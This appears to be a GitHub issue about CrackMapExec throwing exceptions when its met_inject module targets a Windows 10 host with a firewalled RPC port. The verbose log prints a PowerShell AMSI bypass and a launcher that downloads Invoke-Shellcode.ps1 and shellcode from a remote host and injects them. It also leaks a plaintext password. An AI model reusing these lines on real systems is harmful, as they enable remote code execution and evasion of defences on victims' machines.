CrackMapExec Multiple exceptions thrown when executing command and RPC port is firewalled on target

Steps to reproduce

...install bleeding edge pipenv install, pipenv shell python setup.py install
...workon CrackmapExec-KTXXXXX

Command string used

sudo cme smb 192.168.2.0/24 -u céline -p XXXX -M met_inject -o LHOST=192.168.2.15 LPORT=4444 --server-port 5678

CME verbose output (using the --verbose flag)

DEBUG Passed args:
{'clear_obfscripts': False,
 'content': False,
 'cred_id': [],
 'darrell': False,
 'depth': None,
 'disks': False,
 'domain': None,
 'exclude_dirs': '',
 'exec_method': None,
 'execute': None,
 'fail_limit': None,
 'force_ps32': False,
 'gen_relay_list': None,
 'gfail_limit': None,
 'groups': None,
 'hash': [],
 'jitter': None,
 'list_modules': False,
 'local_auth': False,
 'local_groups': None,
 'loggedon_users': False,
 'lsa': False,
 'module': 'met_inject',
 'module_options': ['LHOST=192.168.2.15', 'LPORT=4444'],
 'no_output': False,
 'ntds': None,
 'obfs': False,
 'only_files': False,
 'pass_pol': False,
 'password': ['XXXXX'],
 'pattern': None,
 'port': 445,
 'protocol': 'smb',
 'ps_execute': None,
 'regex': None,
 'rid_brute': None,
 'sam': False,
 'server': 'https',
 'server_host': '0.0.0.0',
 'server_port': 5678,
 'sessions': False,
 'share': 'C$',
 'shares': False,
 'show_module_options': False,
 'spider': None,
 'spider_folder': '.',
 'target': ['192.168.2.0/24'],
 'threads': 100,
 'timeout': None,
 'ufail_limit': None,
 'username': ['c\xc3\xa9line'],
 'users': None,
 'verbose': True,
 'wmi': None,
 'wmi_namespace': 'root\\cimv2'}
DEBUG CME server type: https
DEBUG SMBv1 might be disabled on 192.168.2.5
DEBUG Error retrieving os arch of 192.168.2.1: Could not connect: [Errno 111] Connection refused
DEBUG Your pycrypto doesn't support AES.MODE_CCM. Currently only pycrypto experimental supports this mode.
Download it from https://www.dlitz.net/software/pycrypto
SMB         192.168.2.1     445    NONE             [*] Unix (name:) (domain:WORKGROUP) (signing:False) (SMBv1:True)
DEBUG SMBv1 might be disabled on 192.168.2.5
SMB         192.168.2.5     445    LENOVO-PC        [*] Windows 10.0 Build 17134 x64 (name:LENOVO-PC) (domain:LENOVO-PC) (signing:False) (SMBv1:False)
DEBUG add_credential(credtype=plaintext, domain=WORKGROUP, username=céline, password=Poulette77, groupid=None, pillaged_from=None) => None
SMB         192.168.2.1     445    NONE             [+] WORKGROUP\céline:Poulette77 (Pwn3d!)
DEBUG Generated PS IEX Launcher:
 [Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
IEX (New-Object Net.WebClient).DownloadString('https://192.168.2.15:5678/Invoke-Shellcode.ps1')
$CharArray = 48..57 + 65..90 + 97..122 | ForEach-Object {[Char]$_}
        $SumTest = $False
        while ($SumTest -eq $False)
        {
            $GeneratedUri = $CharArray | Get-Random -Count 4
            $SumTest = (([int[]] $GeneratedUri | Measure-Object -Sum).Sum % 0x100 -eq 92)
        }
        $RequestUri = -join $GeneratedUri
        $Request = "https://192.168.2.15:4444/$($RequestUri)"
        $WebClient = New-Object System.Net.WebClient
        [Byte[]]$bytes = $WebClient.DownloadData($Request)
        Invoke-Shellcode -Force -Shellcode $bytes

DEBUG Generated PS command:
 [Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
try{
[Ref].Assembly.GetType('Sys'+'tem.Man'+'agement.Aut'+'omation.Am'+'siUt'+'ils').GetField('am'+'siIni'+'tFailed', 'NonP'+'ublic,Sta'+'tic').SetValue($null, $true)
}catch{}

$functions = {
    function Command-ToExecute
    {
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
try{
[Ref].Assembly.GetType('Sys'+'tem.Man'+'agement.Aut'+'omation.Am'+'siUt'+'ils').GetField('am'+'siIni'+'tFailed', 'NonP'+'ublic,Sta'+'tic').SetValue($null, $true)
}catch{}
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
IEX (New-Object Net.WebClient).DownloadString('https://192.168.2.15:5678/Invoke-Shellcode.ps1')
$CharArray = 48..57 + 65..90 + 97..122 | ForEach-Object {[Char]$_}
        $SumTest = $False
        while ($SumTest -eq $False)
        {
            $GeneratedUri = $CharArray | Get-Random -Count 4
            $SumTest = (([int[]] $GeneratedUri | Measure-Object -Sum).Sum % 0x100 -eq 92)
        }
        $RequestUri = -join $GeneratedUri
        $Request = "https://192.168.2.15:4444/$($RequestUri)"
        $WebClient = New-Object System.Net.WebClient
        [Byte[]]$bytes = $WebClient.DownloadData($Request)
        Invoke-Shellcode -Force -Shellcode $bytes
    }
}
if ($Env:PROCESSOR_ARCHITECTURE -eq 'AMD64')
{
    $job = Start-Job -InitializationScript $functions -ScriptBlock {Command-ToExecute} -RunAs32
    $job | Wait-Job
}
else
{
    IEX "$functions"
    Command-ToExecute
}


DEBUG Error executing command via wmiexec, traceback:
DEBUG Traceback (most recent call last):
  File "/home/toxic/.virtualenvs/CrackMapExec-KTynyVpX/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/protocols/smb.py", line 391, in execute
    exec_method = WMIEXEC(self.host, self.smb_share_name, self.username, self.password, self.domain, self.conn, self.hash, self.args.share)
  File "/home/toxic/.virtualenvs/CrackMapExec-KTynyVpX/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/protocols/smb/wmiexec.py", line 39, in __init__
    self.__dcom = DCOMConnection(self.__target, self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash, self.__aesKey, oxidResolver = True, doKerberos=self.__doKerberos)
  File "/home/toxic/.virtualenvs/CrackMapExec-KTynyVpX/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/thirdparty/impacket/impacket/dcerpc/v5/dcomrt.py", line 962, in __init__
    self.initConnection()
  File "/home/toxic/.virtualenvs/CrackMapExec-KTynyVpX/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/thirdparty/impacket/impacket/dcerpc/v5/dcomrt.py", line 1051, in initConnection
    self.__portmap.connect()
  File "/home/toxic/.virtualenvs/CrackMapExec-KTynyVpX/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/thirdparty/impacket/impacket/dcerpc/v5/rpcrt.py", line 801, in connect
    return self._transport.connect()
  File "/home/toxic/.virtualenvs/CrackMapExec-KTynyVpX/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/thirdparty/impacket/impacket/dcerpc/v5/transport.py", line 302, in connect
    raise DCERPCException("Could not connect: %s" % msg)
DCERPCException: Could not connect: [Errno 111] Connection refused

DEBUG Error executing command via mmcexec, traceback:
DEBUG Traceback (most recent call last):
  File "/home/toxic/.virtualenvs/CrackMapExec-KTynyVpX/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/protocols/smb.py", line 401, in execute
    exec_method = MMCEXEC(self.host, self.smb_share_name, self.username, self.password, self.domain, self.conn, self.hash)
  File "/home/toxic/.virtualenvs/CrackMapExec-KTynyVpX/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/protocols/smb/mmcexec.py", line 65, in __init__
    dcom = DCOMConnection(self.__host, self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash, None, oxidResolver=True)
  File "/home/toxic/.virtualenvs/CrackMapExec-KTynyVpX/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/thirdparty/impacket/impacket/dcerpc/v5/dcomrt.py", line 962, in __init__
    self.initConnection()
  File "/home/toxic/.virtualenvs/CrackMapExec-KTynyVpX/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/thirdparty/impacket/impacket/dcerpc/v5/dcomrt.py", line 1051, in initConnection
    self.__portmap.connect()
  File "/home/toxic/.virtualenvs/CrackMapExec-KTynyVpX/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/thirdparty/impacket/impacket/dcerpc/v5/rpcrt.py", line 801, in connect
    return self._transport.connect()
  File "/home/toxic/.virtualenvs/CrackMapExec-KTynyVpX/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/thirdparty/impacket/impacket/dcerpc/v5/transport.py", line 302, in connect
    raise DCERPCException("Could not connect: %s" % msg)
DCERPCException: Could not connect: [Errno 111] Connection refused

DEBUG Executed command via atexec
DEBUG Your pycrypto doesn't support AES.MODE_CCM. Currently only pycrypto experimental supports this mode.
Download it from https://www.dlitz.net/software/pycrypto
DEBUG Your pycrypto doesn't support AES.MODE_CCM. Currently only pycrypto experimental supports this mode.
Download it from https://www.dlitz.net/software/pycrypto
Traceback (most recent call last):
  File "/home/toxic/.virtualenvs/CrackMapExec-KTynyVpX/lib/python2.7/site-packages/gevent/greenlet.py", line 536, in run
    result = self._run(*self.args, **self.kwargs)
  File "/home/toxic/.virtualenvs/CrackMapExec-KTynyVpX/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/protocols/smb.py", line 110, in __init__
    connection.__init__(self, args, db, host)
  File "/home/toxic/.virtualenvs/CrackMapExec-KTynyVpX/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/connection.py", line 41, in __init__
    self.proto_flow()
  File "/home/toxic/.virtualenvs/CrackMapExec-KTynyVpX/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/connection.py", line 75, in proto_flow
    self.call_modules()
  File "/home/toxic/.virtualenvs/CrackMapExec-KTynyVpX/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/connection.py", line 105, in call_modules
    self.module.on_admin_login(context, self)
  File "/home/toxic/.virtualenvs/CrackMapExec-KTynyVpX/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/modules/met_inject.py", line 65, in on_admin_login
    connection.ps_execute(launcher, force_ps32=True)
  File "/home/toxic/.virtualenvs/CrackMapExec-KTynyVpX/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/connection.py", line 17, in _decorator
    return func(self, *args, **kwargs)
  File "/home/toxic/.virtualenvs/CrackMapExec-KTynyVpX/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/protocols/smb.py", line 447, in ps_execute
    return self.execute(create_ps_command(payload, force_ps32=force_ps32, dont_obfs=dont_obfs), get_output, methods)
  File "/home/toxic/.virtualenvs/CrackMapExec-KTynyVpX/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/connection.py", line 17, in _decorator
    return func(self, *args, **kwargs)
  File "/home/toxic/.virtualenvs/CrackMapExec-KTynyVpX/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/protocols/smb.py", line 82, in _decorator
    output = func(self, *args, **kwargs)
  File "/home/toxic/.virtualenvs/CrackMapExec-KTynyVpX/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/protocols/smb.py", line 431, in execute
    output = u'{}'.format(exec_method.execute(payload, get_output).strip().decode('utf-8',errors='replace'))
  File "/home/toxic/.virtualenvs/CrackMapExec-KTynyVpX/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/protocols/smb/atexec.py", line 42, in execute
    self.execute_handler(command)
  File "/home/toxic/.virtualenvs/CrackMapExec-KTynyVpX/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/protocols/smb/atexec.py", line 55, in execute_handler
    self.doStuff(data)
  File "/home/toxic/.virtualenvs/CrackMapExec-KTynyVpX/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/protocols/smb/atexec.py", line 123, in doStuff
    dce.connect()
  File "/home/toxic/.virtualenvs/CrackMapExec-KTynyVpX/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/thirdparty/impacket/impacket/dcerpc/v5/rpcrt.py", line 801, in connect
    return self._transport.connect()
  File "/home/toxic/.virtualenvs/CrackMapExec-KTynyVpX/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/thirdparty/impacket/impacket/dcerpc/v5/transport.py", line 394, in connect
    self.__handle = self.__smb_connection.openFile(self.__tid, self.__filename)
  File "/home/toxic/.virtualenvs/CrackMapExec-KTynyVpX/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/thirdparty/impacket/impacket/smbconnection.py", line 511, in openFile
    raise SessionError(e.get_error_code(), e.get_error_packet())
SessionError: SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)
Fri Jun 22 00:03:06 2018 <Greenlet at 0x7f3ffced97d0: smb(Namespace(clear_obfscripts=False, content=False, c, <protocol.database instance at 0x7f4001cf8050>, '192.168.2.1')> failed with SessionError

DEBUG add_credential(credtype=plaintext, domain=LENOVO-PC, username=céline, password=Poulette77, groupid=None, pillaged_from=None) => None
SMB         192.168.2.5     445    LENOVO-PC        [+] LENOVO-PC\céline:XXXXX

CME Version (cme --version)

4.0.1dev - Bug Pr0n

OS

Archlinux

Target OS

Win10

Detailed issue explanation

all the smb modules of cme have issue even altough i have the last version correctly installed

Jun 21 '18 22:06 eroa

There's a lot that could have gone wrong here but judging by the errors it looks like the Windows 10 boxe's rpc port wasn't open/ has been firewalled. I might have to look into why this wasn't handled gracefully as supposed to spewing exceptions everywhere.

Thanks for the report

Aug 28 '18 11:08 byt3bl33d3r

I think this can be closed. As an side, I updated the met_inject options information to specify some additional handlers/payloads that can be used instead of just web_delivery.

Apr 08 '23 19:04 Marshall-Hallenbeck

CrackMapExec CrackMapExec copied to clipboard

Multiple exceptions thrown when executing command and RPC port is firewalled on target

Steps to reproduce

Command string used

CME verbose output (using the --verbose flag)

CME Version (cme --version)

OS

Target OS

Detailed issue explanation

CrackMapExec
CrackMapExec copied to clipboard